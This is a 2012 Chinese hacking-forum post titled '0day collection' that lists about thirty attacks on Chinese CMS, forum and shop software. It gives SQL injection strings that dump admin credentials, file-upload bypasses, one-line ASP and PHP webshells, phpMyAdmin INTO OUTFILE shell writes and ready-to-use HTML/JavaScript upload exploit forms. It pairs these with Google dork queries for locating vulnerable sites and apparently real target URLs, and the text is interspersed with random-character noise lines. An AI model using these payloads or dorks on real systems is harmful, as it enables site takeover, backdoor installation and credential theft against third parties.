中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
9 l* j( Q+ x% s7 G
7 K0 u: \) c3 H. R" e1 K
直接上exploit:
0 U/ v2 U1 k4 U# W9 H6 v
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
7 P0 z+ R4 `1 k
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
$ L+ |8 |: @0 o7 w# r; p" G: {4 d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. s) R; f! D- M0 ?6 O
Asprain论坛 注册用户 上传图片就可拿到webshell
6 @, i/ b: Q. [( A8 v
5 F/ F* A/ O5 `7 v7 t6 e$ _+ q
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
) J: Q: I1 h* g. C. ?+ s9 |
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
" \. j+ r2 j/ p x8 `2 L3 l
2.gif 为一小图片文件,一定要小,比如qq表情图片
: e9 p' R7 ]) m7 M5 G9 Z
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
8 C2 ?! G- W, r: s! i8 a
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
: x# Z3 k# `9 C: W- h8 n
5.q.asp;.gif
4 n- K5 Y) g- |; _. [
google:Powered by Asprain
0 p) X0 s+ g- z/ z i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
B4 w5 j l( }% m* A) V
: f4 i+ t$ ]1 L Z
ShopNum1全部系统存在上传漏洞。
1 Q8 l- s2 X: p$ v. l1 c0 n% n& d7 E
( _. B @+ E. S3 o' I4 u( X
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
6 D7 w4 M7 m( n3 m" z0 S
按说明 提示登录后台。。
; k5 Z. l! Z1 \% u4 C
在后台功能页面->附件管理->附件列表
2 w; ~( B3 b8 a1 w {: q+ b; K0 I
可以直接上传.aspx 后缀木马
6 v4 g/ m) p6 o6 |* Z% o% W
http://demo.shopnum1.com/upload/20110720083822500.aspx
# p2 ^5 n9 W% w& Y6 w( z. \$ e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% n O9 k6 s0 X5 W; `5 C* B2 l
7 L$ r/ M, F( ]! P3 W A: c
牛牛CMS中小企业网站管理系统 上传漏洞
9 \" l* R! ^ M H( D+ a- v6 F
, M0 S3 r' A8 [& E# @
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
* a% ]7 v4 F* T
后台:admin/login.asp
, P, L% z1 W$ l/ F1 y& r0 O0 `
ewebeditor 5.5 Nday
6 j& D. f2 ]( f$ B$ X7 f+ R
exp:
/ u0 p: }# [; M. V6 D
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
8 J: @/ }% W( ]/ t2 r$ W- j5 u
<input?type=file?name=uploadfile?size=100><br><br>?
4 k5 e4 v' _( a; k9 Q/ m
<input?type=submit?value=upload>?
8 ^0 w; D c v( K
</form>
# x9 `+ d) g+ O% @" s3 ]5 m
ps:先上传小马.
& L8 t$ U6 D( X& a* u) a" e6 l
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
6 d! ]( A, C# u) `7 C& z% e" C% h
' p6 c& B! j ^9 ]5 v a* q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" |6 V. F, |" w9 Z, w0 K& @ K
5 E5 S5 s3 ^- Y# ?& U
YothCMS 遍历目录漏洞
* ^8 } m9 r7 Q, S) e' u
1 q3 i- [7 O# Q8 U
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
1 Q1 ~7 K0 E1 [9 l& |
默认后台:admin/login.asp
5 b/ P4 h) B' _& e4 a6 K! M7 m! J
遍历目录:
3 p# q3 w) Q: g1 a+ {6 q
ewebeditor/manage/upload.asp?id=1&dir=../
. F& L6 ^: o; W& |
data:
! g5 h r) z* L+ H
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
& O0 u7 \3 \' A; N* _! W9 J; R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 b) A! j+ l/ |! O
9 a6 @" `6 H3 K
Net112企业建站系统 1.0
: T g! P8 t/ D7 B: I
3 H' _* `3 U* n+ e( l3 q
源码简介:
( \' N- M g4 K
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
; d7 X1 r2 ?$ m1 z! x8 {
添加管理员:
6 W' J# d2 c& v: B8 n5 d
http://www.0855.tv/admin/admin.asp?action=add&level=2
" X9 P- M- l, d8 T' A' m& Q
其实加不加都不是很重要,后台文件都没怎么作验证。
+ \6 ?; X u% @* j4 _
上传路径:
# g3 k# Q) B6 I
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
6 L: G( Y. k. ?/ _9 o; w
http://www.0855.tv/inc/Upfile.asp?Stype=2
; E c( I/ m/ K* ~7 c
怎么利用自己研究。
, T) P M$ T" m/ V3 |, F
遍历目录:
! C7 U" |+ l! H, N! _, S5 v
http://www.0855.tv/admin/upfile.asp?path=../..
$ k! O$ j: U% z) z! \
如:
' ?4 j3 Z! T Q# w- ~3 r
http://www.0855.tv/admin/upfile.asp?path=../admin
. V) k9 r' B) [% h) Z
http://www.0855.tv/admin/upfile.asp?path=../data
. Y% U/ Q* D4 ]# L! v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: \) Y# i/ o6 v! m( y
4 _- j: Y+ {7 @( h$ B2 z
易和阳光购物商城通杀 上传漏洞
( b! x7 N0 u% x
$ T6 K% G a3 w& w0 s" O
前提要求是IIS6.0+asp坏境。
) y' i8 u5 \) B0 G& R
漏洞文件Iheeo_upfile.asp
9 d( Y7 @* P3 _/ a
过滤不严.直接可以iis6.0上传
/ P, c6 T, j o0 x
把ASP木马改成0855.asp;1.gif
7 [5 w' P. m, U# W$ L4 S
直接放到明小子上传
+ U9 b* n* d) I$ v' g0 k
Google搜索:inurl:product.asp?Iheeoid=
5 M, |' g- j) D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% k7 H4 N5 S6 X, p, q# R2 p
c3 `5 z% ^# W+ K; Z
phpmyadmin后台4种拿shell方法
A0 x2 e" P. ~' d
5 `* k3 w1 P4 ^$ Y4 k2 y2 Z
方法一:
7 |; u6 s- v$ g$ R
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
) W. h+ _1 m( ^/ b
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
- }0 o7 z9 m3 @* M4 v
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
' t/ X! O3 D- e( J1 ], Y
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
: [1 A$ \4 w9 d( T2 k1 v+ |
一句话连接密码:xiaoma
8 K+ ~% i9 q0 v" I6 {
方法二:
y _* |% c9 |3 d
Create TABLE xiaoma (xiaoma1 text NOT NULL);
& q2 ~4 p/ g7 D
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
% [* @1 r* a( X4 f8 T# t. A
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
! p9 W& b: l, O2 d p4 P
Drop TABLE IF EXISTS xiaoma;
R8 o: R- |/ j! Q2 v7 `# n' h; w
方法三:
8 T6 T4 J/ c- @, @' C# Z3 B
读取文件内容: select load_file('E:/xamp/www/s.php');
$ y, J: t$ u$ ]3 K- R
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ N) |5 S3 u, s* `/ m
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
! Y2 }* x4 i. A1 H
方法四:
# ~3 B# }; P& P9 f. I
select load_file('E:/xamp/www/xiaoma.php');
{; f( o3 i' u: l: Q, A
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, O4 k/ \4 |. g) N% O" }$ ~7 ?4 Y
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
* R% l4 E- U0 N# G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 f& h6 p2 _1 x2 L9 f+ W. O; Y
( Z' B, j* ]1 {& `# Y' w" u2 ]
传信网络独立开发网站源码0day漏洞
4 T2 ^+ R+ v9 q# Y5 |
4 G6 z$ J# Q3 ]5 w, r7 g
后台system/login.asp
6 d# k L: N0 |6 L0 c4 \4 _
进了后台有个ewebeditor
- |5 F4 N1 [/ g! H' r
Google 搜索inurl:product1.asp?tyc=
+ t# f0 Y5 s! U8 @
编辑器漏洞默认后台ubbcode/admin_login.asp
' o, C4 v! E) v
数据库ubbcode/db/ewebeditor.mdb
' p5 M; X8 y* M4 X2 t# `
默认账号密码yzm 111111
1 v; U! f. ^; D6 n% J U! F
Y& m( ^$ m1 I4 g" c$ m
拿webshell方法
0 w9 |/ V5 r# a% G! S ]
登陆后台点击“样式管理”-选择新增样式
$ U- S6 u9 [1 j- g0 X5 `
样式名称:scriptkiddies 随便写
) B) f" H. v3 v
路径模式:选择绝对路径
1 r% N9 M l! Y6 Z9 S( I
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, \$ j- J' X" y1 q5 K
图片类型比如就是我们要上传的ASP木马格式
/ I2 [/ ? a1 u/ |5 n
上传路径:/
. h9 Q) g/ L* |- _" F
图片限制:写上1000 免的上不了我们的asp木马
8 p; ]0 S- B. x& X/ b( q) [; I
上传内容不要写
6 S6 }" e: d- }' P7 F( p
可以提交了
1 T. J& A: |& W5 e1 M2 b
样式增加成功!
$ _$ h# u& N) M$ U
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
* K: E! ]5 c, L) W9 _& W
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
' B- V% [; [& w, T2 q
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
- ?$ s( B0 R) d1 k6 Y
上ASP木马 回车 等到路径
+ H1 `# J7 H3 V. ]8 G5 X7 s r$ `
2 q3 h& o% g: c1 w% m
后台:system/login.asp
+ ^* c; f) b% X9 `
Exp:
. r) z4 k, T5 g- Y( [
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
; [3 ^3 @2 q5 f% A R
测试:
E& [( W1 p- F% M3 c. `7 P
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
5 ?7 a- \ A$ L5 L0 p# ]- a
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& M0 @3 z% t" x8 | y- I: ?0 G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ s+ w B; V+ r/ r: b) L
$ n6 j9 Y s& Y9 x) {0 d$ G
foosun 0day 最新注入漏洞
+ G# ~' n" H6 G6 d5 N& f
- P5 ~9 ~9 }& n& c% [( D" u; n0 A
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
0 S. F4 g# B& b- u' G
利用简单的方法:
3 v e: Z. c1 y' H
暴管理员帐号:
2 w' [& r6 J4 j, y' C; J
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
{' l3 y; c, u6 _7 h& b* P0 B1 |
暴管理员密码:
3 D3 v$ q: U# x) z" G
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
) f* q4 [" k+ O; u8 k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" }& a+ A4 M6 {2 j4 a% W3 H& b4 W
4 m, @1 z, z$ Y5 y/ ]
网站程序的版权未知!
. l. C5 [$ \8 c) a( f+ r. Q4 Y; e
' P5 X5 W& E2 B$ {0 l( Y5 G
默认网站数据库:
" U$ x. B$ Z/ Y+ ~$ E: F7 s$ p8 ~
www.i0day.com/data/nxnews.mdb
# R* y. Q0 y: H% Y# w% y3 O
ewebeditor 在线编辑器:
4 L& O. G: _7 V( u
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
8 q w+ l/ x1 i: w( {% ] y
登录地址:ewebeditor/admin_login.asp
# n) N7 ?' i9 {& `6 U+ y3 y
默认密码:admin admin
8 E7 \; ~9 o6 Y. f
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
3 M7 t' ^ p5 _, Q" h& {3 P
; Y2 G, Z! f: a
Sql注入漏洞:
; O2 a9 c9 \; s; K- @: D
http://www.i0day.com/detail.asp?id=12
- t8 C1 ^8 `) h$ w' R# h: F
exp:
+ Z! a/ E% f+ ~8 }: d& C1 M$ _
union select 1,admin,password,4,5,6,7,8 from admin
* c; L( r7 H4 {' }- h! Y+ h/ W4 [
爆出明文帐号/密码
- y2 ?/ }: K$ R* k) K3 D
1 ], s% G* R; N5 D9 F' F
上传漏洞:
0 I/ ^# n, o4 _% l% ^# V/ z2 z* O' P4 O
后台+upfile.asp
+ n/ `/ f; F0 g6 E
如:
: d/ B& H0 {$ ?4 h
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
4 ?7 C0 H7 y, G$ i0 F
shell的地址:网址+后台+成功上传的马
n4 J& ~& d9 S( |0 `0 f
google:inurl:news.asp?lanmuName=
5 h$ {& W0 I1 G2 z8 v
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ f9 P0 N* B( v9 I6 x
* T2 x6 p7 f" ]
dedecms最新0day利用不进后台直接拿WEBSHELL
" s' e0 E' ]1 r4 N0 [1 [- p5 m7 I
0 b& N" S5 ]0 X) S1 R
拿webshell的方法如下:
) W4 I. r w9 y2 K2 G' o# I; S2 l
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
, K- B* M" L5 z$ l
前题条件,必须准备好自己的dede数据库,然后插入数据:
0 i, K9 X# {0 f( F0 @$ c% a. V5 Z0 Y
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
! W/ [* Y( U2 c- J# P4 [/ ^
% e1 n/ @, q; Q* Y6 Q1 e7 Y
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
/ r+ a& B5 N0 F1 X8 o
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
) ~% w7 u9 ~8 R, z$ c) W
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
% [5 T" I* d) l, i, [
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
2 V, M$ u; }1 j$ W% P
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
+ N0 q5 ~8 W) V. e5 A8 ?7 z: ]
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" m" E2 s p& R9 w5 _
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 |, F6 j8 d- T0 T* [; T
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ y" s, ^% k5 W8 {# Q, U) w
<input type="text" value="true" name="nocache" style="width:400">
- A2 y, F9 ?1 a4 [
<input type="submit" value="提交" name="QuickSearchBtn"><br />
8 I: J" h, `" @2 @5 e/ t5 }
</form>
7 h8 U4 O; k: Z
<script>
6 z5 ]9 H" S! q- v" a* }% Z
function addaction()
- u* R) q8 D! O5 n" o" a) P
{
( p) C( _( E! N% \: I/ b9 H5 j) j
document.QuickSearch.action=document.QuickSearch.doaction.value;
; t2 ?8 c7 l4 S8 H( x
}
% Y& w2 K9 J6 ^, J0 m- r
</script>
6 c6 {; p, S9 p7 r! M
-----------------------------------------------------------------------------------------------------------------------------------------------
?( f/ w8 {+ |8 b3 ?8 D
& K5 ~% l( G* o
dedecms织梦暴最新严重0day漏洞
6 R( z0 p" e2 Q2 z( Q8 U
bug被利用步骤如下:
: t2 w2 q- ^' M6 L% b
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) F5 E( w% t+ l5 O1 ~
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
" p$ L0 b' b2 ?; @
-------------------------------------------------------------------------------------------------------------------------------------------
) @+ f( e9 V; t d& W2 k
$ _5 y' j; f+ {3 }) R. W' u
多多淘宝客程序上传漏洞
2 @! d* e; O0 ^8 A
漏洞页面:
5 v* V% Z; P1 s, i# [
admin\upload_pic.php
, j5 m/ e/ s1 z, O7 B1 K
传送门:
% M; ^ U8 x3 l: M
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
0 _4 j3 f5 W* j. X5 i
PS:copy张图片马 直接 xxx.php 上传抓包地址!
+ L0 [0 p) |0 ?8 c. [
------------------------------------------------------------------------------------------------------------------------------------------------------
, S. \7 ^8 b+ ~% D6 f6 G0 v& M
( h- e/ x. P' u- \
无忧公司系统ASP专业版后台上传漏洞
7 f2 L& O$ z7 p4 A, K, b6 ~& h, l" t Y, G
漏洞文件 后台上传
- I5 p5 ^( ^- y+ k
admin/uploadPic.asp
7 n% g6 Y% N1 Y5 ~+ j
漏洞利用 这个漏洞好像是雷池的
2 H4 G! m5 e( M9 W
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
: i" @3 k$ f7 P( T( \0 W2 G
等到的webshell路径:
2 v O$ q, i# |$ O% `6 z% a
/UploadFiles/scriptkiddies.asp;_2.gif
/ ~8 D9 ]% y7 d1 q& D8 C: }
---------------------------------------------------------------------------------------------------------------------------------------------------
2 k; v9 E/ z( v4 S
) U+ h9 l3 Y( s7 N. I2 Z& S
住哪酒店分销联盟系统2010
; m. Q B# i+ o0 o
Search:
# e" j6 W# N) r7 c+ [
inurl:index.php?m=hotelinfo
0 F* a8 D7 ?1 W
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
! i) i7 {& j; f# C
默认后台:index.php?m=admin/login
) r0 P" [! D5 Y2 y
--------------------------------------------------------------------------------------------------------------------------------------------------
7 x5 N" m8 z# J7 s
3 T- C6 i, R1 I% D
inurl:info_Print.asp?ArticleID=
4 S2 ]3 l* v8 p* L, T; p8 g' R
后台 ad_login.asp
: A0 x9 S. ^9 F3 o, r: ]- \% S* v
爆管理员密码:
+ }4 j* G- l( R$ k
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
. G( Q1 {& V; Y9 |3 \0 H6 s
------------------------------------------------------------------------------------------------------------------------------------------------------------
2 _9 m1 E2 I7 [0 I4 K
3 t- f8 v* c+ I) I( `
搜索框漏洞!
' j- q) B, h5 `/ B" O, Z
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
7 w$ a! V: G" @2 n5 j e
--------------------------------------------------------------------------------------------------------------------------------------------------------
* _5 R& H3 D( |& _- M/ h/ @
m) P/ B( g# f) M7 Z
关键字:
6 k- U7 l4 }. o( p3 d8 d
inurl:/reg_TemletSel.asp?step=2
) r- K5 x ?* I% k( N
或者
& y9 B; h8 P& H, g: D) j" @
电子商务自助建站--您理想的助手
0 U2 i1 F( G4 X1 _' t
-------------------------------------------------------------------------------------------------------------------------------------------------
" \9 p% I' f2 {& ~: S( z6 _, E6 I
. x& y6 ?; k) L5 G4 a( p" W
iGiveTest 2.1.0注入漏洞
6 c* F" S3 i) U; U! a
Version: <= 2.1.0
' }( S. e- ^! P) R. T+ K+ ~
# Homepage:
http://iGiveTest.com/
/ V$ y& l- c$ B, A+ ^0 F
谷歌关键字: “Powered by iGiveTest”
" q% ]; O3 T. ? s& X- @
随便注册一个帐号。然后暴管理员帐号和密码
' \2 u0 E% `( q( F
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
6 ?7 _* p( ?8 L$ `: [- L
------------------------------------------------------------------------------------------------------------------------------------------------
& g" z9 e2 L" C& c
; D1 Z" d' F K* f: N. {4 w) _
CKXP网上书店注入漏洞
" y/ q& H. F. i, V! C( J
工具加表:shop_admin 加字段:admin
c7 k% D) n- R" y
后台:admin/login.asp
5 T9 s& u8 G9 {. k
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
0 [; w+ a7 J) V: M
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
9 }, }1 H% s8 q( z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# T8 f$ j9 W- b0 j/ H B
0 e- y7 A. B& w% w) `7 ^0 l2 z
段富超个人网站系统留言本写马漏洞
s, w" x: c& |
源码下载:
http://www.mycodes.net/24/2149.htm
/ E: `0 @4 N7 P. f1 P
addgbook.asp 提交一句话。
) Y' J' _& S" @! i% l, q! u* H
连接:
http://www.xxxx.tv/date/date3f.asp
: R! r0 D. u, C) W& L
google:为防批量,特略!
5 Y1 v0 ~2 D7 A& m7 o
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! o3 X, E' `4 W0 l+ P: P- o3 L
$ W' B R7 @2 Q1 R7 l0 I
智有道专业旅游系统v1.0 注入及列目录漏洞
! @1 r. V# J( g
默认后台路径:/admin/login.asp
+ w8 q9 K6 w! x; P
默认管理员:admin
) y2 N% Y# Y8 [
默认密码:123456
, m I, k# V! k9 E2 y3 i
SQL EXP Tset:
0 o' e2 N, q8 e! o: r/ _2 |
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
: E1 ~- I$ K; {/ ?9 e8 K3 M
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 H) t$ }0 v# `2 Q( ~' I
" @* [5 s( i( L2 b1 I
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
1 h4 S3 f i; }4 Z
EXP:
; j6 E# z$ i' ?6 A& X2 e
<title>eWebeditoR3.8 for php任意文件上EXP</title>
) j" y/ ?: }& b1 y* r) ]
<form action="" method=post enctype="multip
( r3 ?" ~! O# X
art/form-data">
9 L# z" m3 Q" p' F7 E) m1 c: y) A$ `
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
# s, O$ c( ?7 P
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
& `( T2 K, y: V! l
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
: Z( G' @2 M V8 W$ `# q
file:<input type=file name="uploadfile"><br>
9 t5 a G6 H/ N; g* I: ]" X+ B
<input type=button value=submit onclick=fsubmit()>
# b. d; M6 ~- q* R& p2 n$ h
</form><br>
( H2 V3 E, H* a5 I0 [
<script>
" r- K9 ^$ a! y; M" {" f1 E
function fsubmit(){
2 |# z. k: ~/ F2 c k
form = document.forms[0];
) ] u0 Y E: r8 n
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
8 |# s- D0 W) ^8 P
alert(form.action);
, n7 u" l+ [, G9 ~+ C+ Q4 H* W; Y
form.submit();
4 T4 `. ~9 P0 m
}
8 K5 B; G0 Z9 O; {
</script>
( o% m0 \4 w; _2 D c# q5 j
注意修改里面ewebeditor的名称还有路径。
' H9 z8 J, P% U+ ~' a2 a
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ L' I( L: H, g8 H& ]: n' ^9 P6 K
8 y3 g# v. f. F- t; ^( k% i8 e2 q
提交’时提示ip被记录 防注入系统的利用
0 {5 ]3 D% t, b- O& K( h+ A6 }2 a* ~
网址:
http://www.xxx.com/newslist.asp?id=122
′
% G# R4 z4 P1 U% R8 ~! A: j* X
提示“你的操作已被记录!”等信息。
9 ] @% t9 @/ u& q+ h; g
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
1 e7 M9 ^ C/ ~+ B# s
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% g' U ?+ F; S# S* f3 H+ S
3 A0 y X# `( K5 }% n
西部商务网站管理系统 批量拿shell-0day
1 k& s8 Z5 K$ r- ?
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
6 p9 U% j& X3 z+ \" _2 n4 _
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
' J) W5 s* C s: w# C# u
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
7 y- P0 D2 d. n! a+ ?( b
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
! O8 [) d" c. F! u' R+ l
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 W/ _; X4 R; l+ V y$ ]
\7 ~5 M/ C4 L- I( \& P( x" v
JspRun!6.0 论坛管理后台注入漏洞
! A: x1 X3 m- B9 g
6 L( t: N) Z4 Z- Y2 n; {
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
; o! B1 f) K3 _& j" a
JspRun!6.0
6 l9 W0 E# `4 J& A
漏洞描述:
4 u& q% j' G$ N7 P+ ^
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
$ @: ~4 |8 Q" @; v
在处理后台提交的文件中ForumManageAction.java第1940行
% f7 N% ~! n7 m! y
String export = request.getParameter("export");//直接获取,没有安全过滤
- b# h3 B' }1 M, S9 P
if(export!=null){
: n* r+ e4 b8 Z& }- h* {
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
' w" ~- ]/ p$ F5 m* L4 ^
if(styles==null||styles.size()==0){
+ ]0 f0 F; S9 } n6 }7 F
<*参考
* q* W/ n2 L, i2 ~/ i2 y
nuanfan@gmail.com
- z1 F" p2 `7 s9 L: T
*> SEBUG安全建议:
0 D, }) {+ f9 W7 h1 T
www.jsprun.net
# Y( e! y; C& F1 y, @' X
(1)安全过滤变量export
" Q" B' S9 @! A7 @$ s
(2)在查询语句中使用占位符
# R) N- A. ]5 [8 J/ D" C# @* e# p
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 z! k- @ R( [7 l; d
4 t- y- k1 {; `1 n& N: _
乌邦图企业网站系统 cookies 注入
6 t) F% q% Q0 \' e8 |. _
% ^0 U/ ?8 N7 x
程序完整登陆后台:/admin/login.asp
* [/ y+ y6 e. t% C
默认登陆帐号:admin 密码:admin888
3 l# p% i0 i2 ]# R/ E6 K
语句:(前面加个空格)
1 ^* k& M6 I) k# m9 s f$ G; O4 w
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
& Z( n5 {! f- \1 u0 E8 _" ~7 p
或者是16个字段:
o% j* V8 o! ]( \4 m5 a5 p
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
3 j1 }7 p' O! |/ r$ s
爆不出来自己猜字段。
4 `" O+ _7 x" `3 O2 E( R1 k
注入点:
http://www.untnt.com/shownews.asp?=88
$ E% o q+ \, D$ K* N9 u |
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
9 x5 `; S) n5 y! x, u" k4 O
关键字:
5 i+ u' g$ N. K# y: r& B, @
inurl:shownews?asp.id=
6 h) f. V# a: e" R0 t3 w
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 v. z! I; ?7 I% o& s! a: S
1 S. x* q; l$ Y
CKXP网上书店注入漏洞
8 V! R: X# z& V
9 v8 @2 ~7 v8 K
工具加表:shop_admin 加字段:admin
/ r) Z x; g6 H8 E0 k
后台:admin/login.asp
' W S o- z5 G+ t8 I
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
